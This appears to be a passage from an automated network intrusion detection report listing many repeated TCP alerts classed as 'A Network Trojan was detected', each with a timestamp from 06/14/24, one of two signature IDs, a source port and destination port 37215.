                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053801
                SID:2829579
                Source Port:53454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967882
                SID:2829579
                Source Port:35742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859990
                SID:2829579
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224853
                SID:2835222
                Source Port:58404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382459
                SID:2829579
                Source Port:42434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811261
                SID:2829579
                Source Port:34720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828476
                SID:2835222
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900240
                SID:2829579
                Source Port:48980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453035
                SID:2835222
                Source Port:39130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727113
                SID:2835222
                Source Port:58590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052803
                SID:2835222
                Source Port:47976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807352
                SID:2835222
                Source Port:45400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906394
                SID:2835222
                Source Port:53022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.387158
                SID:2835222
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.500835
                SID:2829579
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828836
                SID:2829579
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071682
                SID:2829579
                Source Port:44488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737776
                SID:2835222
                Source Port:46166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672246
                SID:2829579
                Source Port:45776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760895
                SID:2829579
                Source Port:41562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293791
                SID:2829579
                Source Port:38284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200312
                SID:2829579
                Source Port:46360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382975
                SID:2829579
                Source Port:55982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020073
                SID:2835222
                Source Port:39470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699798
                SID:2829579
                Source Port:37542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761390
                SID:2835222
                Source Port:47554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977596
                SID:2829579
                Source Port:59488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501888
                SID:2835222
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941642
                SID:2835222
                Source Port:47206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848675
                SID:2829579
                Source Port:54196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051021
                SID:2829579
                Source Port:42682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145959
                SID:2835222
                Source Port:59136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472104
                SID:2835222
                Source Port:45778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663018
                SID:2835222
                Source Port:54992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404973
                SID:2829579
                Source Port:55188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250838
                SID:2835222
                Source Port:41764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020292
                SID:2835222
                Source Port:58908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716328
                SID:2829579
                Source Port:37958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225292
                SID:2835222
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545405
                SID:2829579
                Source Port:60444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200437
                SID:2835222
                Source Port:52260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183688
                SID:2829579
                Source Port:37344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968751
                SID:2829579
                Source Port:55024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759355
                SID:2829579
                Source Port:32834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503463
                SID:2829579
                Source Port:58804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025164
                SID:2829579
                Source Port:60540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762928
                SID:2835222
                Source Port:57908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275775
                SID:2829579
                Source Port:41474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274894
                SID:2829579
                Source Port:46748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501717
                SID:2829579
                Source Port:34624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829227
                SID:2829579
                Source Port:36516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419754
                SID:2835222
                Source Port:40878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150443
                SID:2835222
                Source Port:47410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681215
                SID:2829579
                Source Port:57032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858288
                SID:2835222
                Source Port:50492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113988
                SID:2835222
                Source Port:35880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715690
                SID:2829579
                Source Port:51538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967812
                SID:2835222
                Source Port:38240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969119
                SID:2835222
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991041
                SID:2835222
                Source Port:34588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084773
                SID:2835222
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341235
                SID:2835222
                Source Port:42438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716493
                SID:2835222
                Source Port:49060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763885
                SID:2835222
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202804
                SID:2835222
                Source Port:46344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765803
                SID:2835222
                Source Port:52816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018211
                SID:2835222
                Source Port:35522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033115
                SID:2835222
                Source Port:55632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071172
                SID:2829579
                Source Port:39352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408738
                SID:2835222
                Source Port:49462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878903
                SID:2835222
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776331
                SID:2829579
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134316
                SID:2835222
                Source Port:50514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672990
                SID:2835222
                Source Port:35768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701930
                SID:2835222
                Source Port:36294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972221
                SID:2829579
                Source Port:58210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624790
                SID:2835222
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702113
                SID:2829579
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226517
                SID:2835222
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031459
                SID:2829579
                Source Port:38944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969057
                SID:2829579
                Source Port:55000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728284
                SID:2829579
                Source Port:54158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676584
                SID:2829579
                Source Port:59940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986397
                SID:2835222
                Source Port:56936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225918
                SID:2835222
                Source Port:34414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186155
                SID:2835222
                Source Port:60422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.319906
                SID:2835222
                Source Port:53324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548795
                SID:2829579
                Source Port:36676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942691
                SID:2835222
                Source Port:56510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850730
                SID:2835222
                Source Port:55020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148476
                SID:2829579
                Source Port:47642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846712
                SID:2835222
                Source Port:52476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548697
                SID:2835222
                Source Port:41150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419813
                SID:2829579
                Source Port:40548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543017
                SID:2835222
                Source Port:56662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804004
                SID:2835222
                Source Port:58694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230879
                SID:2829579
                Source Port:52004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186180
                SID:2835222
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018143
                SID:2829579
                Source Port:45512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644074
                SID:2829579
                Source Port:35266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807518
                SID:2835222
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470857
                SID:2829579
                Source Port:51818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405067
                SID:2835222
                Source Port:58328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277000
                SID:2829579
                Source Port:42784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.918036
                SID:2835222
                Source Port:60390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145564
                SID:2835222
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020252
                SID:2835222
                Source Port:44666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342703
                SID:2829579
                Source Port:53574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019557
                SID:2835222
                Source Port:60470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290249
                SID:2835222
                Source Port:42712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984483
                SID:2829579
                Source Port:37478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013377
                SID:2829579
                Source Port:56414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243037
                SID:2835222
                Source Port:40538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246406
                SID:2835222
                Source Port:58670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861318
                SID:2835222
                Source Port:58836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092814
                SID:2829579
                Source Port:52844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409656
                SID:2829579
                Source Port:59358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016696
                SID:2835222
                Source Port:37636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881434
                SID:2829579
                Source Port:52674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877577
                SID:2835222
                Source Port:52724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545159
                SID:2829579
                Source Port:34268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703770
                SID:2835222
                Source Port:49066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337284
                SID:2829579
                Source Port:41860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777981
                SID:2829579
                Source Port:40652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151996
                SID:2835222
                Source Port:40624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971768
                SID:2835222
                Source Port:59670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115483
                SID:2835222
                Source Port:42676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057307
                SID:2829579
                Source Port:57704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805334
                SID:2835222
                Source Port:38934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859575
                SID:2835222
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181969
                SID:2829579
                Source Port:34098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501327
                SID:2829579
                Source Port:35294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879908
                SID:2829579
                Source Port:50120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969529
                SID:2835222
                Source Port:37600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717143
                SID:2829579
                Source Port:53398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992276
                SID:2829579
                Source Port:42730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051692
                SID:2829579
                Source Port:50610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469896
                SID:2829579
                Source Port:54864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134440
                SID:2835222
                Source Port:47354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503934
                SID:2829579
                Source Port:56994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164239
                SID:2829579
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943109
                SID:2835222
                Source Port:37424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519232
                SID:2835222
                Source Port:57378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850710
                SID:2835222
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325538
                SID:2829579
                Source Port:46982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229489
                SID:2829579
                Source Port:50722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726077
                SID:2829579
                Source Port:54458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989916
                SID:2829579
                Source Port:59018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544628
                SID:2835222
                Source Port:46442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337790
                SID:2829579
                Source Port:56800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804639
                SID:2835222
                Source Port:37306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023014
                SID:2829579
                Source Port:47938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133369
                SID:2829579
                Source Port:49184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661710
                SID:2829579
                Source Port:57034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978629
                SID:2835222
                Source Port:58482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185298
                SID:2829579
                Source Port:45908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112020
                SID:2829579
                Source Port:49168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831514
                SID:2835222
                Source Port:43984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943176
                SID:2835222
                Source Port:55766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660395
                SID:2829579
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134766
                SID:2829579
                Source Port:51214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133721
                SID:2829579
                Source Port:46078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663675
                SID:2829579
                Source Port:41358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678945
                SID:2829579
                Source Port:35998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111022
                SID:2835222
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700161
                SID:2829579
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567661
                SID:2829579
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624517
                SID:2829579
                Source Port:59612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689618
                SID:2829579
                Source Port:36942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111246
                SID:2829579
                Source Port:42312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979576
                SID:2835222
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228328
                SID:2829579
                Source Port:48066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032361
                SID:2835222
                Source Port:53186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290704
                SID:2835222
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163978
                SID:2835222
                Source Port:59264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160634
                SID:2829579
                Source Port:54594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366111
                SID:2835222
                Source Port:56404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449731
                SID:2835222
                Source Port:44964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718414
                SID:2829579
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763004
                SID:2835222
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020828
                SID:2829579
                Source Port:58676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381026
                SID:2829579
                Source Port:47464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683937
                SID:2835222
                Source Port:39006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288988
                SID:2829579
                Source Port:43542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339574
                SID:2835222
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023431
                SID:2835222
                Source Port:52196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546326
                SID:2829579
                Source Port:34780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669255
                SID:2829579
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181762
                SID:2835222
                Source Port:41516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033783
                SID:2835222
                Source Port:45992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777075
                SID:2829579
                Source Port:56408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807707
                SID:2829579
                Source Port:56164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134845
                SID:2835222
                Source Port:46276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382742
                SID:2835222
                Source Port:53906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761881
                SID:2835222
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148260
                SID:2835222
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916946
                SID:2835222
                Source Port:57324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
